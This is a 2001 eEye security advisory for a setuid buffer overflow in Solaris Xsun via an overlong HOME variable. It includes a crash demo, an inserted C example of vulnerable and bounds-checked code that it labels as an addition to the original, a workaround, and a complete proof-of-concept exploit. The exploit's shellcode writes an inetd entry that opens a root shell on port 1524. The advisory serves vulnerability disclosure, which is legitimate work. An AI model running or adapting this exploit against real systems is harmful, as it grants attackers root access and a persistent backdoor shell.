From: eEye Digital Security (eeye@EEYE.COM)
Date: Tue Apr 10 2001 - 19:29:08 CDT


    Solaris Xsun buffer overflow vulnerability

    Discovered and exploited by:
    Riley Hassell riley@eeye.com

    Release Date:
    April 10, 2001

    Systems Affected:
    Solaris 7/8 (x86 and sparc)

    Description:
    Yet some more Solaris spring cleaning...

    A buffer overflow was discovered in Xsun, the X server shipped with
    OpenWindows. Since Xsun is installed setuid root, exploiting this
    vulnerability yields root privileges. The overflow is in Xsun's handling
    of the HOME environment variable; an overlong HOME value is enough to
    crash the server:

    bash-2.03$ HOME=`perl -e 'print "A"x1050'`
    bash-2.03$ /usr/openwin/bin/Xsun :1
    Warning: There is no XDISPLAY information for display 1.
    Server is using XDISPLAY information for display 0.
    Default Font Path: /usr/openwin/lib/X11/
    Segmentation Fault (core dumped)
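    The bug class behind the crash above, as an added example that is not
    Xsun source and not part of the original advisory: a setuid program copies
    $HOME into a fixed-size buffer without checking its length, beside the
    bounded version that rejects the advisory's 1050-byte test value instead
    of overflowing. The buffer size (HOME_BUF) and the ".Xdefaults" file name
    are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for illustration; not Xsun's real buffer. */
#define HOME_BUF 1024

/* Vulnerable pattern (for contrast only; never call it with untrusted
 * input): strcpy/strcat stop at the source's NUL, not at the end of
 * 'out', so a HOME longer than HOME_BUF - 12 bytes runs past the buffer
 * and overwrites whatever follows it on the stack. Returns the length
 * of the path written. */
size_t build_xdefaults_unsafe(const char *home, char out[HOME_BUF])
{
    strcpy(out, home);
    strcat(out, "/.Xdefaults");
    return strlen(out);
}

/* Hardened pattern: bound the copy, detect truncation from snprintf's
 * return value, and refuse rather than continue with a partial path.
 * Returns 0 on success, -1 if HOME is missing, empty, or does not fit. */
int build_xdefaults_safe(const char *home, char *out, size_t outlen)
{
    if (home == NULL || home[0] == '\0' || out == NULL || outlen == 0)
        return -1;
    int n = snprintf(out, outlen, "%s/.Xdefaults", home);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';           /* do not leave a half-built path behind */
        return -1;
    }
    return 0;
}

/* Reproduces the advisory's test case, HOME set to 1050 'A's (the
 * equivalent of perl -e 'print "A"x1050'). Returns 1 when the hardened
 * builder rejects it and leaves the output empty, 0 otherwise. */
int long_home_rejected(void)
{
    char home[1051];
    char out[HOME_BUF];
    memset(home, 'A', 1050);
    home[1050] = '\0';
    return build_xdefaults_safe(home, out, sizeof out) == -1 && out[0] == '\0';
}

/* Builds the path for a constructed, ordinary HOME value and returns 1
 * if the result is exactly what a user would expect. */
int normal_home_ok(void)
{
    char out[HOME_BUF];
    if (build_xdefaults_safe("/export/home/riley", out, sizeof out) != 0)
        return 0;
    return strcmp(out, "/export/home/riley/.Xdefaults") == 0;
}

int main(void)
{
    char out[HOME_BUF];
    /* HOME comes from the caller's environment, exactly as in the PoC. */
    if (build_xdefaults_safe(getenv("HOME"), out, sizeof out) != 0) {
        fprintf(stderr, "HOME unset or too long; refusing to build path\n");
        return 1;
    }
    printf("resource file: %s\n", out);
    return 0;
}
```

    Run it once normally and once with HOME set to 1050 'A's as in the
    advisory; the second run exits with an error instead of crashing. The
    same principle applies to every environment variable a setuid program
    reads: the caller controls the contents and the length, so neither can be
    trusted.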

    Proof of Concept:

    /***********************************
     Solaris 7 (x86) /usr/openwin/bin/Xsun
     HOME environment overflow

     Proof of Concept Exploitation
     riley@eeye.com

     Puts a Root shell on local port 1524
    ***********************************/

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    /* Length of the HOME value: NOP sled, shellcode at offset 800, and the
       saved return address overwritten at offset 1037. */
    #define BUFLEN 1041

    /* seteuid(0)/setuid(0)/execve shellcode followed by the "/bin/sh -c"
       command string it runs: write an inetd.conf entry for ingreslock
       (tcp/1524) and start a second inetd on that file. The file name must
       be the same in both halves of the command. */
    char eyecode[] =
    "\xeb\x51\x9a\x65\x65\x79\x65\x07\x90\xc3\x5e"
    "\x29\xc0\x89\x46\xab\x88\x46\xb0\x89\x46\x0c"
    "\x50\xb0\x8d\xe8\xe4\xff\xff\xff\x29\xc0\x50"
    "\xb0\x17\xe8\xda\xff\xff\xff\x29\xc0\x88\x46"
    "\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56"
    "\x8d\x5e\x10\x89\x1e\x53\x8d\x5e\x18\x89\x5e"
    "\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xb2"
    "\xff\xff\xff\x90\x90\xc3\xe8\xb2\xff\xff\xff"
    "\x90\x6b\x61\x6d\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x2f\x62\x69\x6e\x2f\x73"
    "\x68\x20\x2d\x63\x20"
    "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/eeye2001;"
    "/usr/sbin/inetd -s /tmp/eeye2001";

    /* One extra byte so the environment string handed to putenv() is
       NUL-terminated. */
    char buf[BUFLEN + 1];
    unsigned long int esp;
    long int offset = 0;

    /* Returns the current stack pointer (x86 only; the value is left in
       %eax, which is the return register). */
    unsigned long int get_esp()
    {__asm__("movl %esp,%eax");}

    int main (int argc, char *argv[])
    {
            if (argc > 1)
                    offset = strtol(argv[1], NULL, 0);   /* optional adjustment of the return address */
            else
                    offset = -200;
            esp = get_esp();
            memset(buf, 0x90, BUFLEN);                    /* NOP sled */
            buf[BUFLEN] = '\0';
            memcpy(buf+800, eyecode, strlen(eyecode));    /* shellcode inside the sled */
            *((int *) &buf[1037]) = esp+offset;           /* overwrite the saved return address */
            strncpy(&buf[0],"HOME=",5);                   /* turn the buffer into HOME=<payload> */
            putenv(buf);
            execl("/usr/openwin/bin/Xsun", "eEye", ":1",NULL);
            return 0;
    }

    Vendor Status:
    Sun Microsystems has been contacted. They are currently working on patches
    for this and other related vulnerabilities eEye has discovered. We would
    like to thank them for working with us on creating a patch for this
    vulnerability.

    Workaround:
    chmod u-s /usr/openwin/bin/Xsun
    This removes the setuid bit from Xsun, so anyone who exploits this
    vulnerability gains no privileges beyond their own. Note that the X
    server needs root to access the display hardware, so in most
    configurations Xsun can then only be started by root (for example by
    dtlogin), not directly by an unprivileged user.

    Greetings:
    ADM, Lamagra, Zen-Parse, Loki, and Speakeasy Networks

    Copyright (c) 1998-2001 eEye Digital Security
    Permission is hereby granted for the redistribution of this alert
    electronically. It is not to be edited in any way without express consent of
    eEye. If you wish to reprint the whole or any part of this alert in any
    other medium excluding electronic medium, please e-mail alert@eEye.com for
    permission.

    Disclaimer
    The information within this paper may change without notice. Use of this
    information constitutes acceptance for use in an AS IS condition. There are
    NO warranties with regard to this information. In no event shall the author
    be liable for any damages whatsoever arising out of or in connection with
    the use or spread of this information. Any use of this information is at the
    user's own risk.

    Feedback
    Please send suggestions, updates, and comments to:

    eEye Digital Security
    http://www.eEye.com
    info@eEye.com